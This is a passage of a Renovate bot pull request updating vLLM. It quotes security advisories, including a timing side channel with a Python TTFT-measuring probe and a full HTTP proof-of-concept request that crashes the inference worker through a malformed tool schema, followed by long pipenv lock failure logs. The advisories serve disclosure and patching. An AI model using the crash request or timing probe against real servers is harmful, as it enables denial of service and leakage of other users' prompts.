Audio is not affected: librosa.load downmixes to a single channel (mono) by default, so the loaded audio is returned as a one-dimensional numpy array whose structure is fixed.


Severity

  • CVSS Score: 4.2 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching

CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
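
An attacker measures TTFT by timing the first streamed token. A minimal sketch against an OpenAI-compatible endpoint (hypothetical URL and model name; assumes the requests library):

import time
import requests

def measure_ttft(prompt, url="http://localhost:8000/v1/completions"):
    # Time from request start to the first streamed chunk.
    payload = {"model": "some-model", "prompt": prompt, "max_tokens": 1, "stream": True}
    start = time.perf_counter()
    with requests.post(url, json=payload, stream=True) as resp:
        for line in resp.iter_lines():
            if line:  # first non-empty SSE line marks the first token
                return time.perf_counter() - start
    return None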

Environment
  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
  • Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
(Figure: combined ROC curves for 2-chunk prefix matching; image omitted.)

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Tool Schema allows DoS via Malformed pattern and type Fields

CVE-2025-48944 / GHSA-vrq3-r879-7m65

More information

Details

Summary

The vLLM backend used with the /v1/chat/completions OpenAPI endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

Unclosed {, [, or (

Closed: {} and []

Here are some of the runtime errors seen on the crash, depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
  "model": "mistral-nemo-instruct",
  "messages": [{ "role": "user", "content": "crash via type" }],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "crash01",
        "parameters": {
          "type": "object",
          "properties": {
            "a": {
              "type": "something"
            }
          }
        }
      }
    }
  ],
  "tool_choice": {
    "type": "function",
    "function": {
      "name": "crash01",
      "arguments": { "a": "test" }
    }
  },
  "stream": false,
  "max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to an RCE payload; it could have just been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Ag

Contributor Author

renovate bot commented May 31, 2025

⚠️ Artifact update problem

Renovate failed to update artifacts related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: model-servers/vllm/0.6.4/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: /tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.6.4/Pipfile
Using /usr/local/bin/python3 (3.11.13) to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 514ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.6.4-d_r4MF2m, clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.6.4-d_r4MF2m
Locking dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot install -r /tmp/pipenv-eh6hls9k-requirements/pipenv-viassh6l-constraints.txt (line 20) and transformers~=4.40.2 because these package versions have conflicting dependencies.
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

File name: model-servers/vllm/0.6.6/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: /tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.6.6/Pipfile
Using /usr/local/bin/python3 (3.11.13) to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 155ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.6.6-39QtryhM, clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.6.6-39QtryhM
Locking dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot install -r /tmp/pipenv-d72uranr-requirements/pipenv-v3ot_r5b-constraints.txt (line 10) and transformers~=4.40.2 because these package versions have conflicting dependencies.
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

File name: model-servers/vllm/0.8.4/Pipfile.lock
Command failed: pipenv lock
Creating a virtualenv for this project
Pipfile: /tmp/renovate/repos/github/redhat-ai-dev/developer-images/model-servers/vllm/0.8.4/Pipfile
Using /usr/local/bin/python3 (3.11.13) to create virtualenv...
created virtual environment CPython3.11.13.final.0-64 in 124ms
  creator CPython3Posix(dest=/runner/cache/others/virtualenvs/0.8.4-lR4GvG4y, clear=False, no_vcs_ignore=False, global=False)
  seeder FromAppData(download=False, pip=bundle, setuptools=bundle, via=copy, app_data_dir=/tmp/containerbase/cache/.local/share/virtualenv)
    added seed packages: pip==25.2, setuptools==80.9.0
  activators BashActivator,CShellActivator,FishActivator,NushellActivator,PowerShellActivator,PythonActivator

✔ Successfully created virtual environment!
Virtualenv location: /runner/cache/others/virtualenvs/0.8.4-lR4GvG4y
Locking dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot install -r /tmp/pipenv-8q7leh9i-requirements/pipenv-kszlqkpf-constraints.txt (line 19) and transformers~=4.40.2 because these package versions have conflicting dependencies.
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 451, in main
[ResolutionFailure]:       _main(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 436, in _main
[ResolutionFailure]:       resolve_packages(
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/resolver.py", line 400, in resolve_packages
[ResolutionFailure]:       results, resolver = resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 1083, in resolve_deps
[ResolutionFailure]:       results, hashes, internal_resolver = actually_resolve_deps(
[ResolutionFailure]:       ^^^^^^^^^^^^^^^^^^^^^^
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 811, in actually_resolve_deps
[ResolutionFailure]:       resolver.resolve()
[ResolutionFailure]:   File "/opt/containerbase/tools/pipenv/2025.0.4/3.11.13/lib/python3.11/site-packages/pipenv/utils/resolver.py", line 471, in resolve
[ResolutionFailure]:       raise ResolutionFailure(message=e)
Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts

Your dependencies could not be resolved. You likely have a mismatch in your sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this mechanism, then run $ pipenv graph to inspect the versions actually installed in the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
ERROR: Failed to lock Pipfile.lock!

@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 4781d93 to a70fcd1 on August 11, 2025 07:27
@renovate renovate bot requested a review from a team as a code owner on August 11, 2025 07:27
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from a70fcd1 to 27c0fb1 on August 21, 2025 16:42
@renovate renovate bot changed the title from "Update dependency vllm to v0.9.0 [SECURITY]" to "Update dependency vllm to v0.10.1.1 [SECURITY]" on August 21, 2025
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from 27c0fb1 to bcb2a4f on September 25, 2025 21:28
Signed-off-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
@renovate renovate bot force-pushed the renovate/pypi-vllm-vulnerability branch from bcb2a4f to fb53a3d on October 7, 2025 18:12
@renovate renovate bot changed the title from "Update dependency vllm to v0.10.1.1 [SECURITY]" to "Update dependency vllm to v0.11.0 [SECURITY]" on October 7, 2025